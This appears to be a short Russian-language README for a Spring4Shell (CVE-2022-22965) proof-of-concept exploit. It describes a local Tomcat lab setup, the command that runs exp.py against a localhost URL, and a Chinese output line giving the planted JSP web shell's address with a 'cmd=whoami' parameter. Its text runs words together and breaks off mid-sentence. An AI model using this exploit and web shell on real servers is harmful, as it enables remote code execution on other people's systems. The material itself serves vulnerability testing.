
Эксплойт Proof-of-Concept для Spring4Shell (CVE-2022-22965), который развертывает JSP-веб-шелл путем специально сформированных HTTP-запросов к уязвимым приложениям Spring Boot на Apache Tomcat.
Описание уязвимости: https://www.cyberkendra.com/2022/03/springshell-rce-0-day-vulnerability.html
Сборка PoC: https://github.com/BobTheShoplifter/Spring4Shell-POC
Протестировано с JDK 11.0.14, Spring Boot 2.6.5 и Apache Tomcat 9.0.60
mvn clean package для сборки приложенияdemo-0.0.1-SNAPSHOT.war в spring-poc.war и скопируйте этот .war-файл в каталог webapps Tomcatpython exp.py --url http://localhost:8080/spring-poc/greeting
漏洞存在,shell地址为:http://localhost:8080/spring-poc/tomcatwar.jsp?pwd=j&cmd=whoamitomcatwar.jsp, записанный в каталог Tomcat webapps/spring-poc. Этот каталог можно изменить, отредактировав .
exp.py
